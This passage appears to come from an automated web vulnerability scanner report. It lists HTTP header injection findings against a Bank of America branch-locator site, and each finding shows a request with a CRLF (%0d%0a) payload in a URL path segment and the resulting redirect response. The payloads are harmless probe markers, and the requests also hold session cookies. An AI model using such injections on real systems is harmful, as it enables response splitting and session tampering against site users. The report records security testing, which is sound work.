Location: http://locators.bankofamerica.com/locator/locator/374c8
1f59a7f6d99?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.157. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 7f4b6%0d%0adc9ea9be9ba was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7f4b6%0d%0adc9ea9be9ba HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://learn.bankofamerica.com/articles/managing-credit/understanding-your-credit-card.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:33:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=E91318C23574FC282BE8E5ACDB984298.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7f4b6
dc9ea9be9ba?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.158. http://locators.bankofamerica.com/locator/locator/QuickHelp.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/QuickHelp.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b5718%0d%0aee895ff2975 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b5718%0d%0aee895ff2975 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=32890125C88B76F57147825BA815873C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/b5718
ee895ff2975?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.159. http://locators.bankofamerica.com/locator/locator/ResultsDisplayAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/ResultsDisplayAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 68952%0d%0ada36bc52680 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/68952%0d%0ada36bc52680?startIndex=11 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=3AAED15422117F26A81FA8069D855BAC.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/68952
da36bc52680?startIndex=11&shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.160. http://locators.bankofamerica.com/locator/locator/SearchAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/SearchAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6616a%0d%0ab96064b9d0b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/6616a%0d%0ab96064b9d0b HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=2959A122FEDEA6589C5DCE02EC8B375D.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/6616a
b96064b9d0b?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.161. http://locators.bankofamerica.com/locator/locator/SessionTimeout.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/SessionTimeout.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload bbcc3%0d%0a3ca17bd0382 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/bbcc3%0d%0a3ca17bd0382?shouldTest=true HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADCBA6867F91C1EB585F251E8F93DC75.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31; TCID=0007b046-77e2-485a-acb6-a45400000014; NSC_CbolPgBnfsjdb=445b32097852; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 28 Jun 2011 22:53:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=C6C352B8409169D5601399CB3D176E0C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: http://locators.bankofamerica.com/locator/locator/bbcc3
3ca17bd0382
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.162. http://locators.bankofamerica.com/locator/locator/bbcc3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/bbcc3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b89d5%0d%0a93808e55ca8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b89d5%0d%0a93808e55ca8?shouldTest=true HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://burp/show/38
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E3D3354BF951B96A4F54D04B8F1E082D.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; state=MA; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=8E261C99BB21E111BB5352825E59E888.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: http://locators.bankofamerica.com/locator/locator/b89d5
93808e55ca8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.163. http://locators.bankofamerica.com/locator/locator/branch_and_atm_locations/coverage.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/branch_and_atm_locations/coverage.html

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f7f64%0d%0acd0ebce5b96 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/branch_and_atm_locations/f7f64%0d%0acd0ebce5b96 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=AFD9BE239C38E695736C45FEB5CB876C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/branch_and_atm_locations/f7f64
cd0ebce5b96?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.164. http://locators.bankofamerica.com/locator/locator/images/BOFALogo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/BOFALogo.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 53a18%0d%0ab5aba9d0420 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/53a18%0d%0ab5aba9d0420 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=C6BE37659589861F3B383AA52B9D470A.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/53a18
b5aba9d0420?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.165. http://locators.bankofamerica.com/locator/locator/images/closeButton.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/closeButton.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload db030%0d%0aebd76a93087 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/db030%0d%0aebd76a93087 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7894BCA611FAAB1840DF2CF8073E57E8.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; cmTPSet=Y; state=MA; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; searchPageState=%7B%22footprintMapAction%22%3A%22footprintMapAction%20('tx'%2C'o')%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(true%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'BC-8203'%2CLigeoAPI.getSearchResultsMap()%2Cfalse%2Cnull)%3B%5C%22%2C1000)%3B%22%2C%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22hours_24%22%3A%22document.getElementById('hours_24').checked%20%3D%20true%3B%22%2C%22atm_locations%22%3A%22document.getElementById('atm_locations').checked%20%3D%20true%3B%22%2C%22inside_lobby%22%3A%22document.getElementById('inside_lobby').checked%20%3D%20true%3B%22%2C%22drive_up_atm%22%3A%22document.getElementById('drive_up_atm').checked%20%3D%20true%3B%22%2C%22accepts_deposits%22%3A%22document.getElementById('accepts_deposits').checked%20%3D%20true%3B%22%2C%22commercial_deposits%22%3A%22document.getElementById('commercial_deposits').checked%20%3D%20true%3B%22%2C%22bc_locations%22%3A%22document.getElementById('bc_locations').checked%20%3D%20true%3B%22%2C%22open_saturdays%22%3A%22document.getElementById('open_saturdays').checked%20%3D%20true%3B%22%2C%22accepts_appointments%22%3A%22document.getElementById('accepts_appointments').checked%20%3D%20true%3B%22%2C%22night_deposits%22%3A%22document.getElementById('night_deposits').checked%20%3D%20true%3B%22%2C%22drive_up_bc%22%3A%22document.getElementById('drive_up_bc').checked%20%3D%20true%3B%22%2C%22change_orders%22%3A%22document.getElementById('change_orders').checked%20%3D%20true%3B%22%7D; cmRS=&t1=1309349734538&t2=1309349737587&t3=1309349743168&t4=1309349724463&lti=1309349743168&ln=&hr=javascript%3Avoid%280%29%3B&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//burp/show/39

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=ED4525175D8BA2019AF11EF9718B03CF.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/db030
ebd76a93087?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.166. http://locators.bankofamerica.com/locator/locator/images/dkGreyBullet.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/dkGreyBullet.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f28f7%0d%0a85bb8a1cab8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/f28f7%0d%0a85bb8a1cab8 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=54A430B314B9E6B4D1E945AF8AAB224D.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/f28f7
85bb8a1cab8?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.167. http://locators.bankofamerica.com/locator/locator/images/downArrow.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/downArrow.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d2828%0d%0a1896f816a37 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/d2828%0d%0a1896f816a37 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=C5F97A9C2E1409623DEDC23C752CE6C3.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/d2828
1896f816a37?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.168. http://locators.bankofamerica.com/locator/locator/images/equalHousingLender.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/equalHousingLender.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d2f84%0d%0a16ae15a5c80 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/d2f84%0d%0a16ae15a5c80 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=F6140701A331DB49DEB23503E0C06C3C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/d2f84
16ae15a5c80?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.169. http://locators.bankofamerica.com/locator/locator/images/greenDownArrowPin.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/greenDownArrowPin.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4cf53%0d%0a189671db0d9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/4cf53%0d%0a189671db0d9 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%7D; state=MA; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=F5436FA0114C491420630523EA082C87.ftb-web1; Path=/locator/locator
